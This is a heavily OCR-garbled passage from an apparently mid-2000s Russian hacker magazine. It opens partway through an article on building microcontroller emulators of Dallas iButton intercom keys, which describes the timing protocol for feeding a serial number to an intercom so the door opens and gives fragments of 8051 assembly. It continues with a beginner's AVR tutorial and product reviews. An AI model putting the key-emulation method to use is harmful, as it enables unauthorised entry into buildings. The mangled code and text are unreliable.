Но это неспортивно — юзать чужие прошивки и отлав- 
ливать специально оставленные баги в коде. Поэтому я 
начал делать свои эмуляторы и писать под них програм- 
мы. В общем, я попробовал сделать эмуль на 6 различных 
микроконтроллерах разных архитектур, принадлежащих 
двум семействам АѴР и І8051 производства АІтеІ. Пона- 
чалу мной ставились наполеоновские задачи по изго- 
товлению универсального эмулятора с возможностью 
подборки ключа, но потом я оставил эту затею в силу ее 
геморройности и бессмысленности. Пусть ей займутся 
другие люди, кого заинтересует данная статья. 



(100% рабочий эмулятор 
вышел, остальные 
дорабатываются), 

АТ теда8535, АТ теда8 и 
АТІіпуІ 5 — самый мини- 
атюрный эмулятор. 

>Я готов посодейс- 
твовать в создании 
эмулятора смелым и 
умным энтузиастам, в 
прошивке микрокон- 
троллера и подбору 
нужных комплектующих. 
Пиши на мыло — дого- 
воримся. 

> 031 990А — не единс- 
твенный девайс компа- 
нии ОаІІаз. Существуют 
перезаписываемые 
ПЗУ, на которых можно 
носить информацию с 
поддержкой шифро- 
вания. 

> Себестоимость 
эмулятора, не считая 



затраченных трудов, 




□ Принцип действия эмулятора 

Мы достаточно подробно рассмотрели принцип работы 
домофона, и, соответственно, нам не составит боль- 
шой проблемы описать алгоритм программы эмулятора 
Э31990А. Смотрим на рисунок примера чтения ключа и 
думаем, что надо сделать. А сделать надо следующее. 
Висящая в воздухе нога микроконтроллера будет счи- 
таться логической единицей. Г^осле подачи питания на 



меньше 70-80 рублей. 
При желании можно 
даже уложиться в 30 
рублей, если делать 
эмулятор, например, на 
базе АТІіпуІ 2. 



>Уже работающий эму- 
лятор на АТ89С2051 



> Первый неработающий эмулятор 
на базе АТ89С51 
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>Учти, что незакон- 
ное проникновение в 
помещение карается 
законом. Автор статьи 
и редакция не несут 
никакой ответственнос- 
ти за использование 
данной информации в 
незаконных целях. 




> Если тебя заинтересо- 
вала данная статья, то 
ты можешь следить за 
новостями в сообщес- 
тве по радиоэлектро- 
нике ІтЦдУ/шітітшіІу, 
ІіѵеіоигпаІ.сот/ги гасііо 
еіесіг. 
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> На компакт-диске 
ты найдешь рабочую 
прошивку для микрокон- 
троллера АТ89С2051 , 
пример поиска СВС на 
Паскале, АѴВ, І8051; 
код эмулятора под Х51 
архитектуру, разведен- 
ную плату в Р-САРе для 
эмулятора на АТІіпуІ 5. 

А также программу для 
работы с СОМ-портом и 
огромный ОаіаЗІіееі на 
всю эту ботву. 
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> Схема мастера 

контроллер мы должны ждать момента, пока наша ножка 
не уйдет на землю, в ноль. Как мы услышали ноль, раду- 
емся, ждем некоторое время и переводим порт из режи- 
ма чтения в режим записи. Затем опять роняем шину в 
ноль и держим ее некоторое время — генерим импульс 
РПЕЗЕЫСЕ (длительности импульсов смотри в Мануэ- 
ле на диске). Дальше снова переводим шину в режим 
чтения, и ждем, что же нам «скажет» домофон. А он нам 
поведает команду чтения, состоящую из восьми бит. 
Декодировать ее не будем, так как в 99,999% случаев 
он нам выдаст запрос ЗЗН на получение дампа. Мы же 
просто отсчитываем 8 импульсов от мастера и не па- 
римся. Затем начинается самое сложное и интересное 
— надо быстро смотреть, что нам говорит домофон, и 
отвечать ему. Наша задача побитно выдать серийный 
номер, состоящий из восьми байт, о которых я гово- 
рил выше. Это выполняется следующим образом — за- 
гружается байт в какой-нибудь свободный регистр, и 
сдвигается вправо. Далее смотрим бит переноса. И как 
только домофон роняет шину в ноль, если у меня флаг 
переносаустановлен в единицу, то я просто отмалчива- 
юсь на этот импульс. Если же у меня во флаге перено- 
са находиться ноль, то после того как домофон уронит 
шину на землю, я перевожу порт микроконтроллера в 
режим вывода и принудительно удерживаю шину в нуле 
некоторое время. Потом отпускаю и перевожу порт в 
режим чтения. По длительности импульсав нуле мастер 
понимает, что ему было передано. Если ключ совпада- 
ет, то домофон откроет нам дверь. 

О Практика 

Настало время проверить все вышесказанное на прак- 
тике. Для отладки, чтобы не бегать к домофону, я достал 
плату, читающую домофонные ключи. Устройство назы- 
вается ѴѴаІсНЭод, и на самом деле это универсальный 
комбайн, но из всего изобилия функций мне необходи- 
ма только возможность чтюния ключей. Данная платка 
сбрасывает дамг^і ключиАв в ІІЗВ-порт, и любая про- 



> Схема ключа 

грамма, работающая с СОМ-портом (виртуальный СОМ- 
порт), может получить ключ. Этот софт можно найти на 
диске. 

После небольшого геморроя и войны с отладчиком по- 
лучился код. Вот пример кода вывода данных домофону 
на АТ89С2051 . 

; Выдача в линию серийника 
1п: 

; с типом таблетки и СВС8 
; ЕІЗЕЗ: А,В,Р0,Р1 ,Р2 

ОЕМІІЩЗепсІЗег: 



тт 



ш 



АСС,@В0 



ЕМ, #8 



;ожидаем, когда шину уронят в ноль 1 ->0 



352: 



№ 



ТоисЬРиск,$ 



ВВС 



;С:=А.О; зГііЙА; 



ТоисІтРиск.С 



;ТоисІіРиск:=С; 



СШ2 



В,$ 



Деіау 20 из 



зеШ 



ТоисЬРиск 



ЛШ 



ТоисЬРиск,$ 



;цикл пока 0 



0Л\І2 



ві,а ©2 





□ Заключение 

В результате я получил множество эмуляторов. Есть 
100% рабочие эмули, правда, некоторые из них нужно 
довести до ума. 

Как видишь, домофоные ключи устроены не так просто, 
как кажется. Однако эмулировать их доступно каждому, 
кто владеетпрограммированием и паяльником. Надиске 
ты найдешь для этих целей всю необходимую информа- 
цию. Удачи в опытах, хацкер! Ш 




> ѴѴаісбОод для проверки эмуляторов 



> Миниатюрный эмуль на 
АТііпуІ 5 
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ВСЕ ВОЗМОЖНОСТИ 
ДЛЯ ОТДЫХА 
И РАЗВЛЕЧЕНИЙ 

Используя новейший двухъядерный процессор Іпіеі® Репііит® Э 
Персональный компьютер ФРОНТ Т-90 (404) предоставляет Вам больше 
вычислительных ресурсов, позволяя по-настоящему насладиться всеми 
достижениями новейших мультимедиа-программ. 




Два ядра. 
Делай больше. 





ФР <т МТ 

ѵѵѵѵѵѵ.ТгопІрс.ги 
+ 7 ( 495 ) 234-9049 



ТЕХНОПОГИЯ 

ГТОБЕПЫ 



Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, СЫрз, Соге Іпзісіе, Ріаіодіс, ЕІЬегЕхргезз, ЕТОХ, РІазЬРіІе, І386, І486, І960, ІСОМР, ІпзІапІІР, Іпіеі, логотип Іпіеі, ІпІеІ386, ІпІеІ486, ІпІеІ740, ІпіеЮХ2, ІпІеЮХ4, ІпіеІЗХ2, Іпіеі Соге, Іпіеі Іпзісіе, 
логотип Іпіеі Іпзісіе, Іпіеі. Ьеар аЬеасІ., логотип Іпіеі. Ьеар аЬеасІ., Іпіеі ІЧеІВигзІ, Іпіеі ІЧеІМегде, Іпіеі ІЧеІЗІгисІиге, Іпіеі ЗіпдІеОгіѵег, Іпіеі ЗреебЗІер, Іпіеі ЗІгаІаРІазЬ, Іпіеі Ѵііѵ, Іпіеі ХЗсаІе, ІРЫпк, Иапіит, Иапіит Іпзісіе, МС5, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵегОгіѵе, Рагадоп, РРСЬагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, Регіогтапсе аі Уоиг Соттапб, Репііит Іпзісіе, зкоооі, ЗоипсІ Магк, ТЬе Сотриіег Іпзісіе. , ТЬе .Іоигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 








^ ■Геггит 




НАЧИНАЕМ РАБОТАТЬ С МИКРОКОНТРОЛЛЕРАМИ 



ТЫ ВСЕГДА ХОТЕЛ ДЕЛАТЬ ИНТЕРФЕЙСНЫЕ ПЛАТЫ ДЛЯ КОМПЬЮТЕРА, НО СЧИТАЛ, ЧТО РАЗРАБОТКА ПРОЦЕССОРНЫХ 
СИСТЕМ — ЭТО УДЕЛ ГУРУ? НЕТ И ЕЩЕ РАЗ НЕТ! ВСЕ ПРОСТО. ЕСТЬ ЗАМЕЧАТЕЛЬНАЯ ВЕЩИЦА — МИКРОКОНТРОЛЛЕР, И ОНА 
ДОСТУПНА КАЖДОМУ. ПРОСТО НАДО ПОВЕРИТЬ, ЧТО ЭТО ЭЛЕМЕНТАРНО! 



I нашей стране при совке микрокон- 
троллер называли однокристаль- 
ной микроЭВМ, что достаточно 
хорошо раскрывает его функции. Микрокон- 
троллер (сокращенно МК) — это такая мик- 
росхема, в которой встроен процессор с 
памятью и всей периферией. Проще говоря, 
это полноценный компьютер, хотя и с очень 
скромными возможностями. Он выполнен на 
одном кристалле, которому для работы тре- 
буется только питание и залитая в него про- 
шивка. Часто бывает, что для него ставят вне- 
шний кварцевый резонатор для выставления 
нужной частоты (обычно не превышающий 1 6 
МГц). Но в нашем случае это не актуально. 
Программируют под МК обычно на асме или 
Си, хотя и существуюткомпиляторы для других 
языков. Бывают даже интерпретаторы ВАЗІС 
и РогіИ. Для отладки программ используются 
программные симуляторы (проги, на компе 
эмулирующие работу МК), внутрисхемные 



эмуляторы (девайсы, которые эмулируют ра- 
боту микроконтроллера, включенного в схе- 
му). Также есть такая фича, какЛАО, которая 
позволяет управлять работой контроллера 
напрямую с компьютера. 

О Пара слов о самых-самых... 

Самая распространенная архитектура на 
сегодняшний день — І8051 . Это праотец мно- 
гих современных контроллеров. Их выпуска- 
ют практически все мировые производители 
процессоров. Даже в СССР был его аналог 

— 1816ВЕ51 , который, к слову сказать, еще 
производится (по крайней мере, продается). 
І8051 была разработана фирмой ІпіеІ в 1980 
году. Сначала был выпущен самый первый 
микроконтроллер — І8048. Чуть позже в этом 
же году ІпіеІ выпускает следующую модель 

— І8051 (тот же І8048, только более расши- 
ренный). С точки зрения технологии микро- 
контроллер І8051 являлся для своего време- 



ни очень сложным изделием — в кристалле 
было использовано 128 тыс. транзисторов, 
что в 4 раза превышало количество тран- 
зисторов в 16-разрядном микропроцессоре 
І8086. Это процессор с СІЗС-архитектурой 
(Сотріех Іпзігисііоп ЗеІ СотріЛегз/сложный 
набор команд) имеет на своем борту 128 
байт оперативной памяти и 32 программи- 
руемые линии ввода/вывода (то есть четыре 
восьмиразрядных порта). Тактовая частота 
— до24МГ ц. Яркий современный представи- 
тель этого семейства — АТ89С51 , выпуска- 
емый фирмой АітеІ (мануал к нему лежит на 
диске). Следует отметить, что архитектура 
І8051 хоть и очень старая, но достаточно по- 
пулярная даже сейчас. Связано это с низкой 
себестоимостью, а также с обилием разра- 
боток и библиотек. Думаю, она просущест- 
вует еще лет 10, хотя постепенно сдает свои 
позиции, уступая новым, более быстрым и 
дешевым процессорам. 
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> Распиновка Меги8535 




Далее по рейтингу популярности идут микроконтролле- 
ры АѴР (семейства «Ііпу», «сіаззіс» и «теда»). Потом 
следует любимый фрикерами всего мира РІС, выпус- 
каемый фирмой МісгоСНір. Но восьмиразрядная архи- 
тектура постепенно отмирает и заменяется более пер- 
спективными 32-разрядными процессорными ядрами 
АРМ. Данная архитектура тоже очень популярна среди 
мировых разработчиков процессоров. Именно АРМ ис- 
пользуется в современных КПК и мобильниках. Поэтому 
она считается самой перспективной архитектурой, так 
как при низкой стоимости (от двух баксов) имеем полно- 
ценный быстрый и 32-разрядный процессор. 

О Особенности архитектуры 

Микроконтроллеры делятся на два типа архитектур: СІЗС 
и РІЗС. СІЗС-архитектура, к которой принадлежит І8051 и 
х86, имеет большой набор команд, но достаточно медлен- 
ноихвыполняет. Например, выполнениекомандві8051 ар- 
хитектуре идет за машинным циклом, который в АТ89С51 
равен 12 тактам. Микроконтроллеры АѴР, РІС и АРМ яв- 
ляются представителями РІЗС-архитектуры (РебисесІ 
Іпзігисііоп ЗеіСотриіегз/сокращенный набор команд). От- 
личительная особенность РІЗС состоит в том, что команда 
выполняется затакт, и, следовательно, процессор работа- 
ет быстрее на той же тактовой частоте. Но в любой бочке 
меда есть капля дегтя. У РІЗС-архитектуры очень неболь- 
шой набор команд. Например, у РІС1 6Р628 самая сложная 
математическая команда ЗЕІВѴѴР — вычитание (сложения 
нет). А дальше крутись, как можешь. Но народ и умножает, 
и делит, имея в запасе только узкий набор инструкций (в 
данном процессоре всего 35 инструкций!). У АѴР ситуация 
немного лучше. У него нет команд деления, которые легко 
обыгрываются остальными операторами. В составе АѴР 
имеется до 133 инструкций, что ставит данный МК в погра- 
ничное состояние между СІЗС- и РІЗС-архитектурой. 

О Как зашить контроллер 

Думаю, лучшим контроллером для начинающих является 
АѴР. К нему написано огромное количество библиотек и 
программного софта. В инете валяется куча схем на его 
базе. Сам производитель АітеІ занимается поддержкой 
разработчиков, и постоянно на сайте аітеі.сот выклады- 
вает популярные решения насущных задач. Новичкам ре- 
комендую прикупить микроконтроллер АТтеда8535-16РІ 
(см. рисунок). 

Для заливки программы в микроконтроллер необходим 
программатор. Можно купить готовый девайс, но, по-мо- 



ему, его проще спаять самому. Контроллеры АѴР про- 
граммируются по шине ІЗР. Есть и другие способы про- 
граммирования, но мы их рассматривать не будем. Для 
прошивки нашего контроллера мы должны подключиться 
к ногам МОЗІ (6 ножка контроллера), МІЗО (7 ножка), ЗСК 
(8 ножка) и Резеі (9 ножка). Программатор выполнен в 
виде шлейфа, припаянного к 25-контактному разъему 
типа «папа», вставляемого в І_РТ-порт. 

На разъеме І_РТ-порта, соответственно, 2 — Резеі, 3 
— МОЗІ, 4 — ЗСК, 1 0 — МІЗО и любой от 18 до 25 — ѲІ\Ю 
(смотри схему). Для прошивки контроллера МК мы будем 
использовать программу ІІпіРгоІ ( аѵг.пікоіаеѵу.ога '). 
Подключаем контроллер по описанной выше схеме, по- 
даем на него питание и запускаем программу. Если все 
было запаяно правильно, то программа сама опреде- 
лит тип МК. Далее открываем файл прошивки (обычно 
с расширением ОЕЫ, ВІІ\І или НЕХ), потом жмем кнопку 
«Стереть контроллер» (без этой операции АѴР не за- 
шьется, а программа-прошивальщик даст ошибку запи- 
си) и кнопку «Зашить». Все! Программа залита в наш 
микрокомпьютер. 

□ Первая программа для микроконтроллера. 

Все программисты начинали писать свои творения с при- 
митивной программы «НеІІоѴѴогІсІ». Своеобразный «НеІІо 
ѴѴогІб» для микроконтроллера — это процесс моргания 
светодиодом. 

Собираем данную схему. У нас в арсенале имеются и разъ- 
ем программирования, и светодиоды. Теперь нам нужен 
пакет для разработчиков на ассемблере — АѴР Зіисііо. 
Ставим, запускаем и жмем кнопку «ІМеѵѵ ргоіесі». Выби- 
ваем АѴР АззетЫег и называем проект, например, НеІІо 
ѴѴогІсІ. Жмем ІХІехі, выбираем АѴР Зітиіаіог и тип микро- 
контроллера (в нашем случае — АТтеда8535). Все. Те- 
перь ваяем программу. Начинать кодинг следует с инклуд- 
ника: 



іпсіисіе "твбЗбсІеНпс" 



Данное включение определяет имена регистров, пара- 
метры стека и всякую системную инфу, которую можно 
посмотреть, заглянув в него. Данный инклуд для каждо- 
го МК будет свой, его необходимо найти самостоятель- 
но, в папке с АѴР Зіисііо, или покопаться в инете. Далее 
следует описание переменных, но это необязательный 
процесс. Однако он облегчает читабельность и отладку 
нашей программы. Потом по нулевому адресу мы ставим 
безусловный переход на основной код. 






> Мануалы по микроконт- 
роллерам, упоминаемым 
в статье, можно найти 
на диске. Также там 
содержатся программы 
ІІпіРгод, АѴР Зіисііо и 
прошивка для МК. 
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> Пригоршня контроллеров 



> Могучая кучка АВМ 



тт ттттг 

> Микроконтроллер РІС1 6Р628 



> Представители І8051 



> АѴВ-контроллеры на любой вкус 






За переходом обычно находится таблица 
прерываний, но в нашей программе она не ис- 
пользуется. Потом у нас идет инициализация 
стека: 




ІЦі Р 1 6, Іоѵѵ(Н АМ ЕЫ Р) 

ІсІІ Р16,НідІп(Р^ " * ' ' 



оиі РОНТА, РМ 7 

* '4|| 



Тут мы по очереди загружаем в регистр Р17 
значение 1,2, 4, 8 и выводим их в порт, затем 
вызываем процедуру задержки (весь листинг 
программы лежит надиске). Получается, чтоу 
нас по очереди будут зажигаться светодиоды: 
сначала на нулевой ножке порта А, потом на 
первой и т.д., но с некоторой задержкой, оп- 
ределяемой в процедуре ѴѴАІТ : 



Это стандартная процедура, где мы опреде- 
ляем адресное пространство, где будет рас- 
полагаться стек. Значения Іо\/ѵ(РАМЕІ\Ю)и 
НідН(РАМЕІ\Ю) определены в нашем подклю- 
чаемом файле т8535беТіпс. Затем мы ини- 
циализируем порты ввода/вывода. В нашем 
случае мы ставим РОРТА на вывод: 



8е г РМбД ТА-К 




сіѳс Р 1 8 Д 

Ьтс^^^/ѴАІЩ 

с!е^^^^^Н2о| 




О Итого 

Теперь ты можешь сделать 
на базе этого устройства, 
например, переключалку 
елочных гирлянд, просто 
добавив одну микросхему 
(например, ІЛЫ2003А) и по- 
весив на нее реле. 

Дальше можешь модифици- 
ровать программу и сделать 



Командой зег мы загружаем в регистр Р16 
значение ЕР. Далее мы устанавливаем в ре- 
гистре ЭЭРА все пины порта А на вывод. Если 
установить какой-либо бит в ноль, то это будет 
означать, что данный пин порта будет рабо- 
тать на ввод. После всех инициализаций начи- 
нается основная программа, которая бегает в 
бесконечном цикле: 

іюгоа 



Данная процедура работает следующим об- 
разом: уменьшает регистр-счетчик Р18 и пе- 
реходит на метку ѴѴАІТ, если он не стал нулем. 
Если он стал нулем, то пропускает эту коман- 
ду и уменьшает регистр Р19 и снова начинает 
уменьшать регистр Р18. Данная процедура 
рассчитывается по тактам. То есть верхняя 
часть будет равна числу 256*3, потом умножа- 
ем это число снова на 256, потом умножаем на 
число, записанное в регистр Р20, перед вы- 
зовом процедуры (у нас 50). По- 
лучаем 9830400 тактов, что при 
частоте внутреннего таймера 
1 МГц даст задержку пример- 
но 10 секунд. При частоте 4 
МГ ц будет уже 2,5 секунды. 



фрик-девайс, выключалку компьютера и мно- 
жество различных хацкерских устройств. Ій: 



П эра слов об архитектура АѴЕ 

АѴР — это 8-разрядный РІЗС-микроконтрол- 
лер, имеющий быстрое ядро, РІазН-память 
программ РОМ, память данных ЗРАМ, порты 
ввода/вывода и интерфейсные схемы. Г ар- 
вардская архитектура разделяет адресное 
пространство процессора на память данных 
и память программ в микроконтроллерах 
АѴР. АѴР на своем борту имеет 32 байтовых 
регистра общего назначения (от Р0 до Р31 ). 
Шесть регистров могут использоваться как 
три 1 6-разрядных указателя адреса при кос- 
венной адресации данных (X = Р26:Р27, V = 
Р28:Р29 и2 = Р30:Р31 ). У АѴР есть энергоне- 
зависимая память ЕЕРРОМ, предназначен- 
ная только для данных и доступная програм- 
мным путем из микроконтроллера. Частоту 
работы микроконтроллера можно задавать 
внутренним таймером, внешним кварцем 
или РС-цепочкой. У контроллера достаточ- 
но стандартный набор команд, таких как 
МОѴ, ІІ\І,ОІІТ, ІІ\ІС, ЭЕС и т.п. Но есть и свои 
особенности. К примеру, загрузить в регистр 
число-константу можно только командой 
1_Э1. Например: І_ЭІ Р16,0хРА — загрузить в 
регистр Р1 6 значение РАН. 



Прелесть СІЗО-эрхитектуры 

Существует замечательная команда, отра- 
жающая прелесть и недостаток СІЗС-архи- 
тектуры. Это — код для АТ89С51 : 

рЛМС РОфаЬеІ 

Команда уменьшает регистр Р0 на единицу 
и переходит на метку І_аЬеІ, если Р0 не равен 
нулю. Аналогичный код на АѴР будет таким: 

ЭЕСР16 ; уменьшаем Р1 6 на еденицу 
ВРІЧЕ І_аЬеІ ; переход, если не равно нулю 

Правда, для АТ89С51 команда будет выпол- 
няться за машинный цикл, равный 1 2 тактам, 
а для АѴР — всего три такта. 
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АМРЛ 

СДЕЛАЙТЕ РАЗУМНЫЙ 

ВЫБОР 




Процессор АІѴЮ АіЫоп™ 64 - передовая производительность для игр, видео и музыки 

Надежные компьютеры для любых задач. 

Модельный ряд на все запросы и возможности. 3 года гарантии. 

Компьютеры марки <ІЧТ> на базе процессора АМД АіЫоп ™64 спрашивайте в магазинах 
Федеральной сети компьютерных центров РОІ_АКІ5. 

Оптовые поставки (495) 970 1 930. Сеть региональных филиалов. 

ѵѵѵѵѵѵ.атсі.ги 



АМРП 



А^Ыоп 



© 2006 Асіѵапсеб Місго Реѵісез, Іпс. Все права защищены. АМР, логотип стрелка АМР, АМР Тигіоп и любые комбинации логотипов являются зарегистрированными торговыми марками АсІѵапсесІ Місго Реѵісез, Іпс. 









Эргономичная беспроводная мышь 
с интегрированным зарядным устройством 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Разрешение оптического элемента: 800, 1 600 сірі 
Питание: 2 элемента АА 
Радиус действия: 1 0 м 

Дополнительно интегрированное зарядное устройство 
через 118В 
Вес: 140 г 



Стильная тонкая клавиатура 
с мультимедийными кнопками 



(ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 
«Интерфей ЕІЗВ 
^ПІпрѵавиш: мембранные 
Мультимедийные кнопки: 1 1 штук 



с питанием 



Сепіи$ Егдо В815 



ВТС6301 С 



Гавариты; 470x1 75x20 мм 



Гавариты: 1 20x55x35 мм 



1) Низкопрофильные кнопки имеют небольшой ход, что понравится 
поклонникам ноутбуков. 

2) Мультимедийные клавиши имеют крепление, схожее с установкой 
на музыкальных инструментах, например, на рояле. 



1 ) Мышь укомплектована аккумуляторами 1500мАч. Заряжаются они 
в самом девайсе при подключении через ІІЗВ. 

2) Адаптер беспроводной связи можно таскать вместе с мышью, у ко- 
торой для этого есть специальное углубление. 



3) Благодаря ІІЗВ можно «на ходу» подключать и отключать клавиа- 
туру. 

4) Классический черно-серебристый корпус будет хорошо сочетать- 
ся с любым монитором. 

5) Компания дает 5 лет гарантии с возможностью бесплатной замены, 
если ты сам ее, конечно, не раскурочишь. 

6 ) Тонкий профиль корпуса снизит нагрузку на запястья при частой 
работе с текстом. 



7) Дополнительные кнопки разделены на два смысловых блока: уп- 
равление проигрывателем и работа в интернете дома. 





1 ) Установлена всего одна кнопка управления питанием — «зіеер». 
Если хочешь, чтобы комп отключался, а не засыпал, то придется кру- 
тить настройки. 



2) У хакеров со старыми материнскими платами может возникнуть 
проблема при установке ОС, на некоторых из них ВЮЗ не распознает 
ІІЗВ-клавиатуру. 



3) Мышка работает в радиусе 1 0 метров. 

4) Установка брелока с ІІЗВ-приемником в гнездо для переноски авто- 
матически выключает мышь. 

5) Благодаря лазеру точность мышки увеличилась по сравнению с оп- 
тическими собратьями. 

6) Кнопка под большим пальцем позволяет на ходу переключать раз- 
решение от 800 до 1 600 брі. 

7) Колесо позволяет скролить не только вверх/вниз, но и вправо/вле- 
во, так как его можно наклонять. На нажатие оно тоже реагирует. 

8) Есть две настраиваемые кнопки, которые очень удобно располо- 
жены. 

9) Светодиод на спине оповещает о необходимости зарядки аккуму- 
ляторов. 

В 

1) Эргономичная форма и привлекательный дизайн имеют один не- 
большой недостаток: мышь разработана для правшей. 
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Бокс для ноутбучных хардов 2.5" 



Сиііаттег Виіікіскег Сатег 



ЭрВибрационное устройство для 
повышения реализма в играх 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 
Подключение: аудиовыход звуковой карты 
Потребляемая мощность: 100 Вт 
Г авариты: 1 29x36x93 мм 
Вес: 6,3 кг 




1) Девайс работает с любым компьютером, игровой приставкой или 
даже стереосистемой, так как подключается к аудиовыходу. 

2) Различные переходники облегчат подключение к любому виду ау- 
диотехники. 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Модель: А2291 

Размеры: 130х82.4х 19.8 мм 
Материал:Алюминий 
Вес: 155 г 

Интерфейс: Р-АТА к ІІЗВ 2.0 
РСВА чип: Сургезз АТ2+ 

Скорость передачи: 480 МБ/с 

Поддержка ОС: ѴѴіп 8Е/МЕ/2000/ХР, МАО ОЗ 9.04 и выше 




1) По долгу службы многим хацкерам в погонах часто приходится 
сталкиваться с проблемой переноски больших объемов информации. 
Флешки малы по объему, а трехдюймовые НЮй велики по габаритам. 
На этот случай можно воспользоваться 2.5" дисками, ас ними и стиль- 
ным боксом для переноски от ТНегтаІіаке. 



3) Вибрационное устройство можно смонтировать на любой стул или 
кресло при помощи шарнирного хомута. Через стул вибрации из игр 
передаются во все тело. 



2) Он выполнен из чистого алюминия, а сообщение с компом проис- 
ходит через ІІЗВ-порт. Поверь, это очень удобно. При этом не нужно 
никакого сопутствующего софта. 



4) Длины проводов хватит, чтобы расположиться от источника звука 
на расстоянии до 7 метров. 

5) Сила обратной связи и выбор частот, влияющих на работу вибраци- 
онного блока, устанавливается на усилителе. 

6) Толщина соединительных проводов и разъемы не оставляют сомне- 
ний в качестве изготовления устройства. 

7) При помощи специальной подставки возможна установка усилите- 
ля в вертикальном положении, чтобы он занимал меньше места. 

8) Сила вибрации такова, что пустой стул будет подпрыгивать на месте 
при резких звуках в играх. 



1 ) Блок питания ощутимо греется при длительной работе, а его охлаж- 
дающий вентилятор сильно шумит. 



3)С внутренней стороны коробки находятся прокладки из пенорези- 
ны, которые фиксируют и предохраняют ЕЮО от деструктивных дейс- 
твий со стороны окружающей среды. 



4) В комплекте с боксом, кроме небольшого кейса из кожзаменителя, 
диска и мануала, имеется шнур с раздвоенным концом: один питается 
от матери, а через второй происходит трансфер инфы. 




1 ) Крышка при закрытии скрепит и при жестоком обращении может 
легко деформироваться. 

2) Чтобы проверить, не тормозит ли бокс передачу информации на 
диск, мы провели скоростной тест. Диск ТозЫЬа 2.5" (М К 10320 АХ) 
5400ВРМ подключался к ноутбуку стандартным методом, а после 

— через бокс от ТНегтаІіаке. Результатом оказались 1 7,6 Мб/с через 
бокс против 21 ,1 Мб/с в стандартном режиме. 

— не самый скоростной интерфейс. 
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С пультом по жизни! 






строиство дистанционного управления 
от ІКЫпк 



ІѴІ 20 Мазіег РапеІ МРТ-101 



Интерфейсная панель для подключения НОО. 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Интерфейс с компьютером: ЗАТА 
Разъемы: ЮЕ, ЗАТА, Е-ЗАТА, Роѵѵег ЗАТА 
Цвет: белый жемчуг, серый, черный 
Установка: отсек 5,25” 



ХАРАКТЕРИСТИКИ: 

ІІЗВ (возможен СОМ) 

КНОПОК ,ШТ.: 35 

равоты со сторонним пультом ДУ: есть 
авмеры приемника^ мм: 90x50x1 3 
^Размеры пульта^ мм: 1 65x58x26 
Т ип Батареек: 2x1 ,5Ѵ, АА 




1 ) В комплекте идет специальный приемник и диск с софтом. 

2) Инфракрасный ІІЗВ-приемник можно подружить с любым оказав- 
шимся под рукой пультом ДУ: от телевизора, видика, музыкального 
центра или даже кондиционера. 




1 ) Из трех различных расцветок панелей можно подобрать подходя- 
щую к корпусу. 

2) Любой свободный пятидюймовый отсек компьютерного блока мож- 
но превратить в универсальный портал для ЕЮ О. 



3) С подключением вопросов возникнуть не должно — требуется лишь 
воткнуть приемник в свободный ІІЗВ-порт, установить дрова и набор 
софта. 

4) Утилита ІВЫпк.ІЛе — готовый набор пресетов для наиболее по- 
пулярного софта. ЕІастоящая мечта лентяя: никаких настроек, надо 
лишь вспомнить, куда все добро установлено. . . 

5) ІРЫпк.З — расширенная версия утилиты, в которой имеются широ- 
кие возможности по настройке практически под любой софт в твоей 
системе. 



3) ЕІаличие разъемов ЗАТА, е-ЗАТА, ЮЕ позволит подключить все рас- 
пространенные виды хардов. 

4) Благодаря ѴІ 20 Мазіег РапеІ МРТ-1 01 можно подрубить хард по горя- 
чему прямо к работающему компу. После нажатия на кнопку включе- 
ния панели произойдет обнаружение нового винчестера. 

5) Переходник питания имеет разъемы ЗАТА Роѵѵег и МОІ_ЕХ для под- 
ключения различных типов жестких дисков. 




6) Поумолчаниюуправлению поддается, в принципе, любой из извест- 
ных медиаплееров, атакже МісгозоЙРоѵѵегРоіпі, большинство графи- 
ческих «смотрелок» и даже мышиный курсор! 

7) Можно заюзать несколько пультов. К примеру, видеоплеером мож- 
но будетуправлять с ДУ от бытового ОѴО-проигрывателя, аѴѴіпАтр’ом 
— с пульта от музыкального центра! 



1 ) Для подключения устройств необходимо иметь собственные ка- 
бели ЮЕ, ЗАТА или е-ЗАТА. Комплектация предусматривает только 
подключение к материнской плате и кабель питания. 

2) Отсутствует возможность подключения винчестеров с интерфей- 
сом ЗСЗІ. 

3) Блестящее покрытие кнопки со временем стирается, а панель от- 
лично сохраняет отпечатки пальцев. 




8) Приемник выпускается не только в ІІЗВ-варианте, но и в версии с 
СОМ-подключением, а также для установки в корпус в пятидюймовый 
отсек для ОѴО-РОМ — на случай, если места на столе жалко. 

1 0) Цена вопроса — всего лишь 900 рублей за полный набор с пуль- 
том в комплекте. При этом в случае возникновения проблем с под- 
ключением его обменяют на новый безвозмездно! 



1 ) Хотелось бы иметь возможность заливать в пульт прошивку 
для управления бытовой техникой, а не только компом 
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ТНеітпаІІаке ТоидНроѵѵег 700ѴѴІ 



Р51І для любителей мощного железа 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 
Заявленная мощность^ Вт: 700 
Стандартных разъемов (МолексХ шт. 7 
Количество ЗАТА-разъемов., шт. 6 
Количество ЕОО-разъемов., шт. 2 
РСІ-Ехргегг (6 контактов)^ шт. 2 
Основной разъем , контактов. 24 
АІІХ-разъем: нѳт 
Покраска: черный зеркальный 




1 ) Настоящий мужик должен питать страсть или хотя бы испытывать 
уважение к мощным устройствам. Например, к таким, как новый блок 
питания отТНегтаІіаке (700 Вт). 

2) Разобрав его, обнаруживаем отличную пайку элементов, алюми- 
ниевые радиаторы для дополнительного охлаждения и наличие дрос- 
селей. 

3) Чтобы судить о серьезности этого черного девайса, стоит только 
обратить внимание на его вентилятор: 140 мм в диаметре — это не 
шутка. Однако работает он довольно тихо и покой мирных граждан 
не нарушает. 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 

Поддерживаемые форматы: Сотрасі РІазб І/ІІ, СР Ехіегте СагсІ, ІВМ 
